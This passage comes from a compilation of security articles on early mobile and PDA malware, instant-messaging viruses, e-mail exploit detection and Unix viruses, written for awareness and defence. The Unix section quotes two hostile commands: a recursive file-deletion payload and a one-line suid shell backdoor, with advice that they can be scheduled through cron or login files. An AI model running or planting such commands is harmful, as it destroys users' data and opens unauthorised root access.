cations programs.  Palm  Phage  can  theoretically  spread  to  other 
machines  when  the  Palm  is  synchronised  with  a PC  or  when  a 
Palm  beams  data  via  an  infrared  link  to  another  Palm. 

At  about  the  same  time,  several  joke  programs  were  observed 
on  PDAs  that  operate  on  the  EPOC  operating  system.  Little  more 
than  nuisances,  these  programs  (e.g.,  EPOC_Alone.A  and 
EPOC_Ghost.A)  disturb  users  by  sounding  an  alarm  or  flashing 
lights  on  the  EPOC-enabled  device.  While  these  programs  do  not 
spread  from  device  to  device,  they  demonstrate  that  malicious 
code  can  cause  bothersome  disturbances  on  wireless  devices. 
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Furthermore,  the  wireless  world  is  seeing  the  regular  birth  of 
new  technologies,  with  more  on  the  horizon.  Some  of  these  tech- 
nologies will  expand  the  functionality  of  the  device  while  others 
will  dramatically  change  their  connectivity  with  other  devices 
(e.g.,  Bluetooth  technology). 

No  users  have  lost  data  as  a result  of  Palm  Phage  and  the 
EPOC  joke  programs.  But  this  malicious  code  ups  the  ante  for 
such  code  in  the  wireless  arena— demonstrating  that  self-repli- 
cating  viruses  are  not  only  possible  to  develop,  but  easy  to  devel- 
op. And  with  the  expanded  functionality  of  these  devices  in  the 
coming  months  and  years,  so  will  expand  the  potential  for  new 
threats  from  malicious  code. 

Content-based  Threats 

In  content-based  threats,  the  content  (e.g.,  derogatory  messages)  is 
the  threat,  or  malicious  use  of  the  content  is  the  threat  (e.g.,  spam- 
ming of  e-mail).  While  e-mail  has  become  the  ‘killer  app’  of  the 
wireless  world,  it  is  also  one  of  the  most  vulnerable  to  attack. 
Hence,  the  most  common  content-based  threats  to  the  wireless 
infrastructure  occur  through  infected  e-mail  or  spam  mail. 

The  first  content-based  Trojan  to  attack  wireless  devices 
occurred  in  June  2000  with  the  appearance,  in  the  wild,  of  the 
Visual  Basic  Script  (VBS)  Timofonica  on  the  wireless  network  of 
Madrid,  Spain-based  Telefonica  SA.  Timofonica  spread  by  sending 
infected  e-mail  messages  from  affected  computers.  When  an 
infected  e-mail  reached  a PC,  it  used  Microsoft  Outlook  98  or  2000 
to  send  a copy  of  itself  via  infected  e-mails  to  all  addresses  in  the 
MS  Outlook  Address  Book.  This  enabled  the  Trojan  to  spread  quite 
rapidly.  In  the  wired  world,  this  behaviour  is  similar  to  that  of  the 
“ILoveYou”  e-mail  virus  that  caused  worldwide  damage  estimated 
as  high  as  $700  million  in  May  2000. 

But  Timofonica  was  more  than  an  e-mail  virus.  For  each  e- 
mail  it  sent,  the  Trojan  also  dispatched  an  SMS  message  to  a ran- 
domly generated  address  at  the  “correo.movistar.net”  Internet 
host  (see  Figure  4).  Since  this  host  sends  SMS  messages  to  mobile 
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phones  operating  on  the  European  GSM  standard  (the  phone 
number  is  the  prefix  of  the  e-mail  address  in  the  message),  the 
Trojan  tried  to  spam  people  with  SMS  messages— in  this  case  a 
derogatory  depiction  of  Spanish  telecom  provider  Telefonica 
Moviles. 

Like  the  Liberty  Crack  Trojan,  the  Timofonica  attack  was 
benign  and  caused  little  damage.  Although  the  program  reached 
out  into  the  wireless  world,  it  propagated  via  land-based  PCs  and 
e-mails,  not  from  phone  to  phone  directly.  Nevertheless, 
Timofonica  demonstrated  in-the-wild,  the  ability  of  malicious 
code  to  tap  into  the  wireless  infrastructure  and  spread  with  great 
speed.  Timofonica  had  the  potential  to  flood  the  wireless  network 
with  messages,  reducing  its  performance  or  even  impairing  its 
ability  to  meet  load.  Worse,  for  wireless  users  billed  on  a per-mes- 
sage  basis,  receiving  spam  costs  them  money.  A similar  program 
was  observed  on  Japan’s  ambitious  I-mode  system.  Japan’s  largest 
cellular  phone  maker,  NTT  DoCoMo,  developed  and  owns  the  I- 
mode  system  which  appears  to  have  successfully  captured  both 
consumer  and  business  markets  for  wireless  device  transactions, 
wireless  Internet  access,  and  instant  messaging  in  Japan.  With 
more  than  10  million  users  only  18  months  after  its  launch,  some 
analysts  see  I-mode  as  a feasible  alternative  to  WAP  being  used  in 
Europe  and  touted  in  North  America. 

In  June  2000,  a piece  of  malicious  code  began  to  send  a partic- 
ular message  to  wireless  users  on  the  I-mode  system.  When  the 
user  received  the  message  and  clicked  on  a hypertext  link,  the  pro- 
gram dialled  110— the  Japanese  equivalent  of  911  in  North 
America— without  the  prior  knowledge  of  the  user.  This  loading  of 
emergency  service  lines  with  useless  calls  demonstrated  the  abili- 
ty of  malicious  code  to  reach  out  to  other  key  infrastructures  and 
cause  serious  damage.  Another  potential  content-based  threat 
that  may  soon  enter  the  wireless  world,  as  wireless  devices  become 
more  sophisticated  over  time,  is  the  embedded  script  virus.  Prior 
to  the  first  observation  of  this  class  of  viruses,  viruses  could  be 
contracted  only  through  e-mail  by  double  clicking  on  an  infected 
e-mail  attachment.  With  the  discovery  of  embedded  script  viruses, 
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such  as  the  VBS_Kakworm  and  VBS_Bubbleboy,  viruses  can  now 
infect  a user’s  system  when  the  e-mail  is  opened. 

Mixed  Application/Content-based  Threats 

Application-based  wireless  threats,  in  which  an  executable  program 
carries  some  malicious  code,  affect  the  receiving  device.  The  spread 
of  this  malicious  code  is  slow  since  the  user  must  download  a pro- 
gram with  malicious  code  and  execute  the  program  to  become 
infected.  At  the  other  end  of  the  spectrum  are  content-based  threats 
that  spread  relatively  benign  text  messages  or  generate  cellular 
phone  calls.  Yet,  these  threats  can  spread  rapidly  due  to  the  nature 
of  their  propagation  medium— entire  address  books  of  e-mails. 

The  third  type  of  threat  is  worse  than  the  previous  two  types 
combined.  While  not  yet  seen  in  the  wild  or  even  in  the  laborato- 
ry, a threat  that  integrates  techniques  from  both  of  these  threat 
types  could  be  formidable  indeed.  Imagine  a virus  that  involved 
the  unwitting  download  of  sophisticated  malicious  code  attached 
to  a shareware  program  that  wiped  out  wireless  device  applica- 
tions and  propagated  itself  rapidly  across  the  wireless  infrastruc- 
ture via  address  books  of  e-mail.  Such  a virus  could  cause  damage 
to  each  device  it  encountered  and  spread  across  a country,  or 
across  the  world,  overnight.  Given  the  reality  of  the  ILoveYou  virus 
and  its  destructive  power,  without  adequate  comprehensive  wire- 
less infrastructure  virus  protection,  some  type  of  highly  destruc- 
tive, rapidly  spreading  wireless  virus  will  inevitably  surface. 

Threats  On  The  Horizon  To  Consumers  And  Corporations 

In  many  parts  of  the  world  today,  cellular  phones  are  used  almost 
exclusively  for  voice  communication.  Yet,  as  cellular  phone  tech- 
nology is  merged  with  the  platform-independent  Java  program- 
ming language  and  emerging  technologies  such  as  Bluetooth, 
these  cell  phones  will  be  able  to  send  and  receive  data  and  appli- 
cations, even  from  one  wireless  device  directly  to  another  wireless 
device.  The  line  between  PDAs  and  cellular  phones  is  already 
blurred,  and  few  dispute  that  the  integrated,  transaction-enabled 
wireless  device  that  handles  both  voice  and  data  will  soon  become 
a widespread  reality. 
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So,  as  consumers  download  games  that  can  be  played  offline, 
access  the  stock  market,  and  pay  for  groceries  with  their  wireless 
devices,  business  people  will  read  e-mail,  send  short  messages,  and 
read  graphics  and  charts  on  their  wireless  devices.  Unfortunately, 
this  wireless  utopia  is  unlikely  to  come  without  a price— increas- 
ingly sophisticated  wireless  threats  that  utilise  the  same  capabili- 
ties (e.g.,  connectivity,  functionality,  and  speed).  Viruses  can 
spread  from  wireless  device  to  wireless  device,  from  wireless 
device  to  point-of-sale  device  (e.g.,  at  the  grocery  counter),  and 
from  wireless  device  to  PC. 

The  latter  path  offers  a mode  of  transmission  for  viruses  to 
wireless  and  wired  internal  LANs,  and  further  propagation  across 
the  Internet.  Currently,  corporate  IT  managers  have  little  control 
over  which  wireless  and  handheld  devices  their  users  are  connect- 
ing to  the  network.  Connecting  a portable  device  (such  as  a PDA) 
into  a PC  that  is  connected  (or  subsequently  connected)  to  the  net- 
work is  similar  to  inserting  a floppy  disk— that  has  not  been 
scanned  for  viruses— into  a computer. 

A protection  solution  for  the  wireless  infrastructure  must  have  the 
following  attributes: 

o Multiple  layers  of  protection  to  address  the  various  entry  points 
and  transmission  paths  of  viruses  and  malicious  code 
o Integration  of  centralised  management  of  all  antivirus  solu- 
tions including  maintenance  of  gateway,  server,  desktop,  and 
device-level  protection 

o Implementation  within  the  wireless  infrastructure  for  early 
detection  to  minimise  damage  and  costs 
o Tools  tailored  to  the  wireless  threat,  rather  than  merely  apply- 
ing wired  world  tools 

o Mechanisms  for  automatic  maintenance,  updating,  and  upgrad- 
ing of  virus  protection  since  such  protection  is  only  as  good  as 
the  last  update 

o Involve  all  parties  via  increased  awareness  of  the  potential 
threat  including  corporate  IT  managers,  service  providers,  oper- 
ating system  and  application  developers,  and  end  users 
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IM  Viruses 

Source:  “Instant  messaging  safety  and  privacy  tips" 
available  at 

www.microsoft.com/athome/security/chat/imsafety.mspx 

Instant  messaging,  commonly  referred  to  as  IM,  is  a method  of 
online  communication  like  e-mail.  The  main  difference,  as  the 
name  suggests,  is  that  IM  is  instantaneous.  Using  an  IM  program- 
such  as  MSN  Messenger,  Windows  Messenger,  AOL  Instant 
Messenger,  Yahoo  Messenger,  or  others— you  and  a friend  can  type 
messages  to  each  other  and  see  the  messages  almost  immediately. 

Because  IM  has  become  so  popular,  virus  writers  are  using  it  to 
spread  malicious  programs.  Read  on  to  find  out  how  to  avoid  get- 
ting or  spreading  a virus  when  you  use  IM. 

Understanding  Instant  Message  Viruses 

Like  e-mail  viruses,  instant  message  viruses  are  malicious  or  annoy- 
ing programs  that  are  designed  to  travel  through  IM.  In  most  cases 
these  viruses  are  spread  when  a person  opens  an  infected  file  that 
was  sent  in  an  instant  message  that  appeared  to  come  from  a friend. 

When  unsuspecting  people  open  these  files,  their  computers 
can  become  infected  with  a virus.  Because  of  the  virus,  their  com- 
puters may  slow  down  or  stop  responding,  or  they  may  not  notice 
any  change  at  all.  However,  the  virus  might  have  installed  a covert 
program  on  their  computer  that  could  damage  software,  hard- 
ware, or  important  files,  and  that  may  include  spyware,  which  can 
track  information  entered  on  a computer. 

A computer  infected  by  a virus  may  continue  to  spread  the 
infection  by  sending  copies  of  the  virus  to  everyone  on  your  IM 
contact  list.  A contact  list  is  the  collection  of  IM  names  (similar  to 
an  e-mail  address  book)  that  you  can  store  in  your  IM  program. 

Five  Steps  To  Help  Avoid  Instant  Message  Viruses 

As  with  most  threats  on  the  Internet,  you  can  help  keep  yourself 
safe  by  taking  basic  precautions.  If  you  know  how  to  avoid  e-mail 
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viruses,  you’ll  already  be  familiar  with  many  of  these  steps. 

1.  Be  careful  downloading  files  in  IM.  Never  open,  accept,  or 
download  a file  in  IM  from  someone  you  don’t  know.  If  the 
file  comes  from  someone  you  do  know,  don’t  open  it  unless 
you  know  what  the  file  is  and  you  were  expecting  it.  Contact 
the  sender  by  e-mail,  phone,  or  some  other  method  to  con- 
firm that  what  they  sent  was  not  a virus. 

2.  Update  your  Windows  software.  Visit  Windows  Update  to 
scan  your  computer  and  install  any  high-priority  updates 
that  are  offered  to  you.  If  you  have  Automatic  Updates 
enabled,  the  updates  are  delivered  to  you  when  they  are 
released,  but  you  have  to  make  sure  you  install  them. 

3.  Make  sure  you’re  using  an  updated  version  of  your  IM  soft- 
ware. Using  the  most  up-to-date  version  of  your  IM  software 
can  better  protect  your  computer  against  viruses  and  spy- 
ware.  If  you’re  using  MSN  Messenger,  install  the  updated  ver- 
sion by  visiting  the  MSN  Messenger  Web  site  and  clicking  the 
‘Download  Now!’  button. 

4.  Use  anti-virus  software  and  keep  it  updated.  Anti-virus  soft- 
ware can  help  to  detect  and  remove  IM  viruses  from  your 
computer,  but  only  if  you  keep  the  antivirus  software  cur- 
rent. If  you’ve  purchased  a subscription  from  an  anti-virus 
software  company,  your  anti-virus  software  may  update 
itself  when  you’re  connected  to  the  Internet. 

5.  Use  anti-spyware  software  and  keep  it  updated.  Some  IM 
viruses  may  install  spyware  or  other  unwanted  software  on 
your  computer.  Anti-spyware  software  can  help  to  protect 
your  computer  from  spyware  and  remove  any  spyware  you 
may  already  have.  If  you  don’t  have  anti-spyware  software, 
you  can  download  the  new  Microsoft  Windows  AntiSpyware 
(Beta)  or  another  spyware  removal  tool. 
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Why  You  Need  An  E-mail  Exploit  Detection 
Engine 

Source:  “Why  You  Need  an  Email  Exploit  Detection  Engine:  Networks  Must 
Supplement  Anti-Virus  Protection  for  Maximum  Security" 
available  at 

www.secinf.net/anti_virus/Why_You_Need_an_Email_Exploit_Detection_Engine_Net 
works_Must_Supplement_AntiVirus_Protection_for_Maximum_Security.html 


Virus-writers  are  using  increasingly  complex  and  sophisticated 
techniques  in  their  bid  to  circumvent  anti-virus  software  and 
disseminate  their  viruses.  A case  in  point  was  the  notorious 
Nimda  virus  that  used  multiple  methods  to  spread  itself  and 
was  based  on  an  exploit  rather  than  on  the  virus/Trojan  behav 
iour  that  anti-virus  products  typically  search  for.  Anti-virus 
software,  though  essential,  cannot  combat  such  threats  alone; 
an  e-mail  exploit  detection  tool  is  also  necessary. 

What  Is  An  Exploit? 

An  exploit  uses  known  vulnerabilities  in  applications  or  operating 
systems  to  execute  a program  or  code.  It  “exploits”  a feature  of  a 
program  or  the  operating  system  for  its  own  use,  such  as  execut- 
ing arbitrary  machine  code,  read/write  files  on  the  hard  disk,  or 
gain  illicit  access. 

What  Is  An  E-mail  Exploit? 

An  e-mail  exploit  is  an  exploit  launched  via  e-mail.  An  e-mail 
exploit  is  essentially  an  exploit  that  can  be  embedded  in  an  e-mail, 
and  executed  on  the  recipient’s  machine  once  the  user  either 
opens  or  receives  the  e-mail.  This  allows  the  hacker  to  bypass  most 
firewalls  and  anti-virus  products. 

The  Difference  Between  Anti-virus  Software  And  E-mail 
Exploit  Detection  Software 

Anti-virus  software  is  designed  to  detect  known  malicious  code.  An  e- 
mail  exploit  engine  takes  a different  approach:  it  analyses  the  code 
for  exploits  that  could  be  malicious.  This  means  it  can  protect  against 
new  viruses,  but  most  importantly  against  unknown  viruses  or  mali- 
cious code.  This  is  crucial  as  an  unknown  virus  could  be  a one-off 
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piece  of  code,  developed  specifically  to  break  into  your  network. 

E-mail  exploit  detection  software  analyses  e-mails  for 
exploits— i.e.,  it  scans  for  methods  used  to  exploit  the  OS,  e-mail 
client  or  Internet  Explorer— that  can  permit  execution  of  code  or 
a program  on  the  user’s  system.  It  does  not  check  whether  the 
program  is  malicious  or  not.  It  simply  assumes  there  is  a securi- 
ty risk  if  an  e-mail  is  using  an  exploit  in  order  to  run  a program 
or  piece  of  code. 

In  this  manner,  an  e-mail  exploit  engine  works  like  an  intru- 
sion detection  system  (IDS)  for  e-mail.  The  e-mail  exploit  engine 
might  cause  more  false  positives,  but  it  adds  a new  layer  of  securi- 
ty that  is  not  available  in  a normal  anti-virus  package,  simply 
because  it  uses  a totally  different  way  of  securing  e-mail. 

Anti-virus  engines  do  protect  against  some  exploits  but  they  do 
not  check  for  all  exploits  or  attacks.  An  exploit  detection  engine 
checks  for  all  known  exploits.  Because  the  e-mail  exploit  engine  is 
optimized  for  finding  exploits  in  e-mail,  it  can  therefore  be  more 
effective  at  this  job  than  a general  purpose  anti-virus  engine. 

An  Exploit  Engine  Requires  Fewer  Updates 

An  exploit  engine  needs  to  be  updated  less  frequently  than  an 
anti-virus  engine  because  it  looks  for  a method  rather  than  a spe- 
cific virus.  Although  keeping  exploit  and  anti-virus  engines  up-to- 
date  involve  very  similar  operations,  the  results  are  different.  Once 
an  exploit  is  identified  and  incorporated  in  an  exploit  engine,  that 
engine  can  protect  against  any  new  virus  that  is  based  on  a known 
exploit.  That  means  the  exploit  engine  will  catch  the  virus  even 
before  the  anti-virus  vendor  is  aware  of  its  emergence,  and  cer- 
tainly before  the  anti-virus  definition  files  have  been  updated  to 
counter  the  attack.  This  is  a critical  advantage,  as  shown  by  the  fol- 
lowing examples  that  occurred  in  2001. 

The  Lessons  Of  Nimda,  BadTrans.B,  Yaha  And  Bugbear 

Nimda  and  BadTrans.B  are  two  viruses  that  became  highly  known 
worldwide  in  2001  because  they  infected  a colossal  number  of 
Windows  computers  with  Internet  access.  Nimda  alone  is  estimated 
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to  have  affected  about  8.3  million  computer  networks  around  the 
world,  according  to  US  research  firm  Computer  Economics 
(November  2001).  Nimda  is  a worm  that  uses  multiple  methods  to 
automatically  infect  other  computers.  It  can  replicate  through  e-mail 
using  an  exploit  that  was  made  public  months  before  Nimda  hit,  the 
MIME  Header  exploit.  BadTrans.B  is  a mass-mailing  worm  that  dis- 
tributes itself  using  the  MIME  Header  exploit.  BadTrans.B  first 
appeared  after  the  Nimda  outbreak.  With  their  highly  rapid  infection 
rate,  both  Nimda  and  BadTrans.B  took  anti-virus  vendors  by  surprise. 
Though  the  vendors  tried  to  issue  definition  file  updates  as  soon  as 
they  learned  about  each  virus,  the  virus  had  already  succeeded  in 
infecting  a large  number  of  PCs  by  the  time  the  anti-virus  updates 
were  released.  Though  both  viruses  used  the  same  exploit,  anti-virus 
vendors  had  to  issue  a separate  definition  file  update  for  each.  In  con- 
trast, an  e-mail  exploit  detection  engine  would  have  recognized  the 
exploit  used  and  identified  the  attempt  to  automatically  launch  an 
executable  file  using  the  MIME  header  exploit.  As  a result,  it  would 
have  blocked  both  worms  automatically,  preventing  infection. 

Other  Examples  Of  Exploits 

Double  extension  vulnerability  viruses:  Klez,  Netsky  and  Lovegate. 
What  it  does:  Malicious  files  are  given  a double  extension  such  as 
filename.txt.exe  to  trick  the  user  into  running  the  executable. 

URL  spoofing  exploit  viruses:  No  virus/worm  has  been  found  to  be 
using  this  method.  However  it  has  been  used  to  inject  backdoors 
on  Windows  computers. 

What  it  does:  Allows  spammers  and  phishers  (scammers,  or  peo- 
ple trying  to  defraud  computer  users)  to  fool  users  to  visit  a mali- 
cious website  instead  of  a legitimate  one. 

Object  data  file  execution  viruses:  Bagle.Q. 

What  it  does:  Allows  attackers  to  automatically  infect  unpatched 
versions  of  IE/Outloolc  (Express)  by  downloading  and  executing 
code  from  an  HTTP  site. 
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Computer  Viruses  In  UNIX  networks 

Source:  “Computer  Viruses  In  Unix  Networks” 

Available  at 

www.cvbersoft.com/whitepaper5/papers/print/network5_print.html 

The  Existence  Of  The  Problem  And  Its  Nature 

The  problem  of  software  attacks  exists  in  all  operating  systems. 
These  attacks  follow  different  forms  according  to  the  function 
of  the  attack.  In  general,  all  forms  of  attack  contain  a method 
of  self  preservation  which  may  be  propagation  or  migration 
and  a payload.  The  most  common  method  of  self  preservation 
in  Unix  is  obscurity.  If  the  program  has  an  obscure  name  or 
storage  location,  then  it  may  avoid  detection  until  after  its  pay- 
load  has  had  the  opportunity  to  execute.  Computer  worms  pre- 
serve themselves  by  migration  while  computer  viruses  use 
propagation.  Trojan  horses,  logic  bombs  and  time  bombs  pro- 
tect themselves  by  obscurity. 

While  the  hostile  algorithms  that  have  captured  the  gener- 
al public’s  imagination  are  viruses  and  worms,  the  more  com- 
mon direct  problem  on  Unix  systems  are  Trojan  horses  and 
time  bombs.  A Trojan  horse  is  a program  that  appears  to  be 
something  it  is  not.  An  example  of  a Trojan  horse  is  a program 
that  appears  to  be  a calculator  or  other  useful  utility  which  has 
a hidden  payload  of  inserting  a back  door  onto  its  host  system. 
A simple  Trojan  horse  can  be  created  by  modifying  any  source 
code  with  the  addition  of  a payload.  One  of  the  most  favourite 
payloads  observed  in  the  wild  is  “/bin/rm  -rf  / >/dev/null  2>&1” 
This  payload  will  attempt  to  remove  all  accessible  files  on  the 
system  as  a background  process  with  all  messages  redirected  to 
waste  disposal.  Since  system  security  is  lax  at  many  sites,  there 
are  normally  thousands  of  files  with  permission  bit  settings  of 
octal  777.  All  files  on  the  system  with  this  permission  setting 
will  be  removed  by  this  attack.  Additionally,  all  files  owned  by 
the  user,  their  group  or  anyone  else  on  the  system  whose  files 
are  write  accessible  to  the  user  will  be  removed.  This  payload  is 
not  limited  to  use  by  Trojan  horses  but  can  be  utilized  by  any 
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form  of  attack.  Typically,  a time  bomb  can  be  created  by  using 
the  “cron”  or  “at”  utilities  of  the  Unix  system  to  execute  this 
command  directly  at  the  specified  time. 

While  the  bin  remove  payload  is  a favourite  of  many 
authors,  there  are  other  traditional  attacks  which  are  not  as 
overt  in  their  destruction.  These  other  attacks  are  more  impor- 
tant because  they  bend  the  operation  of  the  system  to  the  pur- 
poses of  the  attacker  while  not  revealing  themselves  to  the  sys- 
tem operator.  Attacks  of  this  form  include  the  appending  of  an 
account  record  to  the  password  file,  copying  the  password  file 
to  an  off  site  email  address  for  leisurely  cracking  and  modifi- 
cation of  the  operating  system  to  include  back  doors  or  cause 
the  transfer  of  money  or  property.  It  is  extremely  simple  to 
email  valuable  information  off  site  in  such  a manner  as  to 
insure  that  the  recipient  cannot  be  traced  or  located.  Some  of 
these  methods  are  path  dependent,  however,  the  path  selected 
is  at  the  discretion  of  the  attacker. 

One  of  the  most  simple  methods  of  inserting  a back  door  is  the 
well  known  suid  bit  shell  attack.  In  this  attack,  a Trojanised  pro- 
gram is  used  to  copy  a shell  program  to  an  accessible  directory. 
The  shell  program  is  then  set  with  permission  bits  that  allow  it  to 
execute  with  the  user  id  and  permission  of  its  creator.  A simple 
one  line  suid  bit  shell  attack  can  be  created  by  adding  the  follow- 
ing command  to  a user’s  “.login”  or  any  other  file  that  they  exe- 
cute. Example:  cp  /bin/sh  /tmp/gotu  ; chmod  4777  /tmp/gotu 

Trojan  horses  and  time  bombs  can  be  located  using  the 
same  methods  required  to  locate  viruses  in  the  Unix  environ- 
ment. There  are  many  technical  reasons  why  these  forms  of 
attack  are  not  desirable,  the  foremost  being  their  immobility.  A 
virus  or  worm  attack  is  more  important  because  these  pro- 
grams are  mobile  and  can  integrate  themselves  into  the  oper- 
ating system.  Of  these  two  forms  of  attack,  the  virus  attack  is 
the  hardest  to  detect  and  has  the  best  chance  of  survival. 
Worms  can  be  seen  in  the  system  process  tables  and  eliminated 
since  they  exist  as  individual  processes  while  virus  attacks  are 
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protected  from  this  form  of  detection  by  their  host  programs. 
All  of  the  methods  used  to  detect  and  prevent  viruses  are  also 
effective  against  the  other  forms  of  attack,  therefore,  the 
remainder  of  this  paper  will  deal  with  the  more  serious  prob- 
lem of  viral  attacks. 


Unix  Virus  Attacks 

The  promotion  of  the  concept  of  “magical  immunity”  to  com- 
puter viral  attacks  surfaces  on  a regular  basis.  This  concept, 
while  desirable,  is  misleading  and  dangerous  since  it  tends  to 
mask  a real  threat.  Opponents  of  the  possibility  of  viral  attacks 
in  Unix  state  that  hardware  instructions  and  operating  system 
concepts  such  as  supervisor  mode  or  permission  settings,  secu- 
rity ratings  like  C2  or  B1  provide  protection.  These  ideas  have 
been  proven  wrong  by  real  life.  The  use  of  supervisor  mode,  the 
additional  levels  of  protection  provided  by  C2  and  the  manda- 
tory access  control  provided  by  security  level  B1  are  not  neces- 
sary for  viral  activity  and  are  therefore  moot  as  a method  of 
protection.  This  fact  is  supported  by  the  existence  of  viruses 
that  infect  Unix  systems  as  both  scripts  and  binary. 

In  fact,  virus  attacks  against  Unix  systems  will  eventually 
become  more  popular  as  simpler  forms  of  attack  become  obso- 
lete. Computer  viruses  have  significantly  more  virility,  methods 
of  protection  and  opportunity  for  infection.  Methods  of  protec- 
tion have  been  highly  refined  in  viruses,  including  rapid  repro- 
duction by  infection,  migration  though  evaluation  of  its  envi- 
ronment, (boot  viruses  look  for  uninfected  floppy  diskettes) 
armor,  stealth  and  polymorphism.  In  addition,  the  host  system 
itself  becomes  a method  of  protection  and  propagation.  Virus 
infected  files  are  protected  just  as  much  by  the  operating  sys- 
tem as  are  non-infected  files.  Introduction  of  viruses  into  sys- 
tems have  also  been  refined  using  technology  called  ‘droppers’. 
A dropper  is  a Trojan  horse  that  has  a virus  or  viruses  as  a pay- 
load.  Finally,  extensive  networking  technology  such  as  NFS 
(Network  File  System)  allows  viruses  to  migrate  between  sys- 
tems without  effort. 
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All  of  these  reasons  point  to  viruses  as  the  future  of  hostile 
algorithms,  however,  the  most  significant  reason  for  this  deter- 
mination is  the  effectiveness  of  the  virus  as  a form  of  attack. 
Past  experiments  by  Doctor  Fred  Cohen  [1984]  used  a normal 
user  account  on  a Unix  system,  without  privileged  access,  and 
gained  total  security  penetration  in  30  minutes.  Doctor  Cohen 
repeated  these  results  on  many  versions  of  Unix,  including 
AT&T  Secure  Unix  and  over  20  commercial  implementations  of 
Unix.  The  results  have  been  confirmed  by  independent 
researchers  worldwide.  Separate  experiments  by  Tom  Duff 
[1989]  demonstrated  the  tenacity  of  Unix  viruses  even  in  the 
face  of  disinfectors.  The  virus  used  in  Mr.  Duffs  experiment 
was  a simple  virus  written  in  script.  The  virus  was  believed  to 
have  been  reintroduced  by  the  operating  system  from  the  auto- 
mated backup  and  restore  system.  Re-infection  took  place  after 
the  system  had  been  virus  free  for  one  year. 

Heterogeneous  Virus  Attacks 

Non-Unix  PCs  attached  to  a heterogeneous  network  that  were 
infected  with  computer  viruses  originating  from  Unix  servers 
have  been  observed.  The  Unix  systems  were  not  the  original 
point  of  entry  for  the  viruses.  They  were  dormant  while  on  the 
Unix  systems  but  became  harmful  when  they  migrated  to  their 
target  systems.  The  Unix  systems  acted  as  unaffected  carriers  of 
computer  viruses  for  other  platforms.  For  the  sake  of  simplici- 
ty, I have  named  this  effect  after  an  historical  medical  problem 
of  similar  nature,  ‘Typhoid  Mary  Syndrome’.  Networks  and 
specifically  Unix  servers  that  provide  network  file  systems  are 
very  susceptible  to  this  problem. 

This  problem  was  first  observed  while  investigating  an 
infection  of  personal  computers  attached  to  a network  with  a 
large  population  of  Unix  servers  and  workstations.  The  virus 
was  manually  attacked  on  the  personal  computers  using  virus 
scanners.  During  the  infection  period  all  of  the  personal  com- 
puters were  disconnected  from  the  network  and  idle.  Once  all 
the  computers  were  disinfected,  all  removable  media  was  test- 
ed and  the  infection  was  unobserved  for  a period  of  time,  the 
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computers  were  reattached  to  the  network.  A few  weeks  later,  a 
test  of  the  computers  using  the  same  virus  scanner  indicated 
they  had  become  re-infected  with  the  same  viruses.  The  source 
of  infection  was  then  identified  as  repositories  of  executables 
stored  on  the  Unix  file  servers. 

These  repositories  were  organically  grown  centralized 
resources  for  all  the  personal  computers  because  the  Unix 
servers  were  effective  at  providing  these  shared  services  via 
NFS.  In  retrospect,  this  problem  had  to  exist.  The  use  of  net- 
worked systems  that  were  exported  from  the  Unix  platforms 
provided  an  easy,  powerful  method  of  transferring  data,  includ- 
ing executables.  Some  network  designs  provide  all  third  party 
software  from  a network  disk  for  ease  of  maintenance  and 
reduced  storage  requirements.  This  easy  access  provides  an 
open  door  for  viruses. 

Trans-platform  Viruses  Attack  Unix 

During  late  1994  and  early  1995  were  observed  multiple 
instances  of  at  least  three  trans-platform  virus  attacks  on  Unix 
systems.  All  of  these  attacks  involved  MS-DOS  viruses  that 
attacked  PC  based  Unix  systems.  The  first  attack  involved  a 
virus  that  corrupted  the  Unix  file  system  every  night.  The 
attack  was  located  using  a virus  scanner  and  indicated  a Unix 
binary  that  was  executed  at  midnight  by  cron.  The  MS-DOS 
virus  had  become  embedded  in  the  Unix  executable  where  it 
was  executed.  The  virus  did  not  perform  as  designed  in  that  the 
corruption  was  the  result  of  the  virus  attempting  to  infect 
other  files  and  was  not  an  intended  effect.  The  virus  was  rein- 
stalled every  morning  when  the  system  was  restored.  The  sec- 
ond attack  involved  an  MS-DOS  virus  that  executed  and  was  suc- 
cessful in  infecting  other  files.  Once  again,  the  file  system  cor- 
rupted but  it  took  longer  in  duration,  thereby  allowing  the 
virus  to  propagate.  The  final  infection  involved  a boot  sector 
virus.  Since  this  type  of  virus  executes  prior  to  the  loading  of 
the  operating  system  , the  differences  between  Unix  and  MS- 
DOS  are  moot.  The  PC-BIOS  and  processor  chips  are  the  same  in 
both  cases  and  the  virus  is  able  to  execute  according  to  design. 
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In  fact,  two  different  viruses  were  observed  performing  in  this 
way.  The  first  virus  was  spread  by  an  MS-DOS  setup  diskette 
while  the  second  virus  was  transmitted  using  a still  undiscov- 
ered method.  While  we  observed  no  boot  sector  infections  of  PC 
based  Unix  systems  during  1994,  we  received  reports  from  sys- 
tem administrators  who  were  requesting  information  on  our 
Unix  anti-virus  product  because  they  had  experienced  hun- 
dreds of  infections  during  1995.  In  one  instance,  a single 
multinational  company  lost  its  entire  international  network 
overnight.  The  estimated  cost  in  lost  time,  resources,  and  sales 
was  in  the  millions  of  dollars. 

Once  it  is  understood  that  the  BIOS  and  processor  functions 
are  the  same  for  both  operating  systems,  it  is  very  easy  to  see 
how  a trans-platform  virus  could  be  designed  by  intention.  The 
virus  would  be  able  to  process  correctly  by  inspecting  the  oper- 
ating system  using  only  common  BIOS  calls  and  then  modify  its 
basic  behaviour  using  a simple  “if’  structure. 

Traditional  Categories  Of  Protection  And  Their  Failure 

There  are  three  traditional  categories  of  protection,  none  of 
which  provide  complete  or  significant  protection  as  stand- 
alone methods  of  implementation.  The  categories  are  Control, 
Inspection  and  Integrity.  Each  of  these  methods  has  tradition- 
ally been  used  separately. 

Control  has  been  the  primary  intent  of  the  U.S.  national 
standards  on  computer  security.  They  deal  with  the  control  of 
access  to  the  system,  its  functions,  resources  and  the  ability  to 
move  or  share  data  in  the  system.  These  national  standards  are 
codified  in  a library  generally  referred  to  as  the  Rainbow  series. 
(The  name  was  given  because  the  books  have  different  colour 
covers  making  a library  shelf  look  like  a rainbow.)  While  these 
standards  are  a valuable  and  important  aspect  of  computer 
security,  they  do  not  provide  a deterrent  against  software 
attack.  A virus  is  an  effective  way  of  gaining  control  over  a sys- 
tem, even  a highly  controlled  system  such  as  a B1  rated  version 
of  Unix.  In  this  case,  control  does  not  provide  protection 
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against  software  attacks  because  of  the  viruses’  ability  to 
change  permission  sets  with  each  new  owner  that  is  infected.  A 
virus  attack  gains  access  to  multiple  users  through  shared  files. 
Access  control  is  designed  to  allow  the  sharing  of  files.  The  abil- 
ity to  share  files  is  a basic  need  of  the  user  and  cannot  be  elim- 
